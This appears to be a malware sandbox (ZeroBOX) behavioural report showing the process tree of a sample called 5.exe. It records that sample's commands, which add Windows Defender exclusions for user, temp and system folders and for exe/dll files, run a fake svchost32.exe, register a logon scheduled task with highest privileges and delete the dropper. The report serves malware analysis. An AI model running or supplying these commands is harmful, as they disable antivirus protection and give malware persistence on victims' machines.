| ZeroBOX

5.exe "C:\Users\test22\AppData\Local\Temp\5.exe"
1196
- cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
  932
  - powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
    808
  - powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
    2756
- cmd.exe cmd /c start C:\Windows\itstartup.exe
  2828
  - itstartup.exe C:\Windows\itstartup.exe
    2324
    - cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
      816
      - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
        836
      - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
        972
      - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp'
        2292
      - powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
        2952
    - cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\itstartup.exe"
      2312
      - svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\itstartup.exe"
        2176
        
        cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "itstartup" /tr '"C:\Windows\system32\itstartup.exe"' & exit
        2240
        
        schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "itstartup" /tr '"C:\Windows\system32\itstartup.exe"'
        1788
        
        itstartup.exe "C:\Windows\system32\itstartup.exe"
        2376
        
        cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
        1616
        
        powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
        1280
        
        powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
        1792
        
        cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\itstartup.exe"
        532
        
        svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\itstartup.exe"
        1172
        
        cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "itstartup" /tr '"C:\Windows\system32\itstartup.exe"' & exit
        2032
        
        schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "itstartup" /tr '"C:\Windows\system32\itstartup.exe"'
        2704
        
        cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe"
        2792
        
        choice.exe choice /C Y /N /D Y /T 3
        2104

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents